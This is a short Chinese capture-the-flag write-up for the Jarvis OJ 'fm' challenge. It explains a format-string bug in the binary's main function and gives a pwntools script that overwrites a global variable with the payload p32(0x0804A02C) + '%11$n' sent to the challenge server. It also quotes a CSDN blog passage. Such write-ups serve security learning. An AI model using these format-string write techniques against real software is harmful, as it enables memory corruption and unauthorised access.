fm

拿到之后首先ida一下，看一下主函数，找漏洞点：

然后就发现第10行是一个很简单的格式化字符串漏洞，看一下x的内存地址：

x的值是3，所以要利用格式化字符串漏洞的任意地址读写，“x_addr%[i]$n”，%n可以将已经输出的字符个数写入到指定的参数中，这个格式化字符串会在栈上的某处，需要定位x_addr作为printf的第几个参数来确定[i]的值，由于x_addr在32位程序中刚好是4个字节，所以这个格式化字符串刚好能把相应参数变为4。
————————————————
版权声明：本文为CSDN博主「yudhui」的原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/github_36788573/article/details/80723670

这里附上一个有关格式化字符串漏洞的博客，助于理解：https://www.cnblogs.com/ichunqiu/p/9329387.html

找到0x41414141，为第十一个参数，然后再验证一下：

然后就可以把AAAA的位置变成x的地址，p换成n，这样参数x的值就会被写为4了，上脚本：

from pwn import *#p = process('./fm')
p = remote('pwn2.jarvisoj.com', 9895)payload = p32(0x0804A02C) + '%11$n'
p.sendline(payload)
p.interactive()